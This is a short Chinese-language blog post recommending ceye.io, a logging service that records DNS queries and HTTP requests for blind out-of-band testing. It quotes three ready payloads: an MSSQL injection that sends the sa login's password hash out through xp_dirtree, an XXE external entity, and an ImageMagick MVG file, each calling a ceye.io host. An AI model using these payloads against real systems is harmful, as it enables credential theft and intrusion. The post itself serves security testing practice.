標籤:

可能很多人已經知道了,但還是安利一波ceye.io吧

發現了一個不錯的小工具 —— ceye.io

創宇開放的一個網站,不過在 telnet404 的 passport 處竟然沒有給上鏈接,吐血:

(是不是 logo 還沒做好的原因)

網站要用 telnet 404 帳號登陸,本身功能挺簡單的,只是記錄 DNS 查詢和 http 請求。不過很多人手頭上沒錢買/懶得買VPS(比如我),這個網站提供的功能對於我等窮逼還是十分實用的 qaq 。伺服器大概就是利用泛解析來幫助我們收集記錄,比方說你可以SSRF example.com 時讓它訪問 flag.youruniqueid.ceye.io ,當你受到帶有 flag 的 query 時,你就知道是 example.com 發來的請求了。

給大家兩幅圖片感受一下:

比較經典的利用方式就是用它各種通信外帶了,比如(以下代碼來源於 hackinglab.cn

SQLi:

DECLARE @host varchar(1024);nSELECT @host=(SELECT TOP 1nmaster.dbo.fn_varbintohexstr(password_hash)nFROM sys.sql_logins WHERE name=sa)n+.ip.port.b182oj.ceye.io;n EXEC(master..xp_dirtreen"+@host+foobar$");n

XXE:

<?xml version="1.0" encoding="UTF-8"?>n<!DOCTYPE root [n<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">n%remote;]>n<root/>n

ImageMagick:

push graphic-contextnviewbox 0 0 640 480nfill url(http://ip.port.b182oj.ceye.io)npop graphic-contextn

當然還有SSRF等等等,總之就是各種通信外帶,在 blind test 的時候特別好用。

但總體還是有待改進,一個是訪問略慢,第二個是希望以後可以讓我們自定義http response,DNS response,這樣就可以跑出 burp collaborator / DNS rebind 的效果了,還剩下一筆 vps 的錢(☆???)。

當然,如果你有獨立的 VPS,當我沒發這篇文章。

(BTW:求廉價穩定且不用綁定信用卡的 VPS 服務商 (′?ω?`)

推薦閱讀:

馬雲想要的刷臉支付,谷歌真的幫他實現了!
參加 DEF CON、Black Hat 這樣的大會是一種怎樣的體驗?
為啥現在大多數手機開機後不能直接使用指紋?

TAG:信息安全 |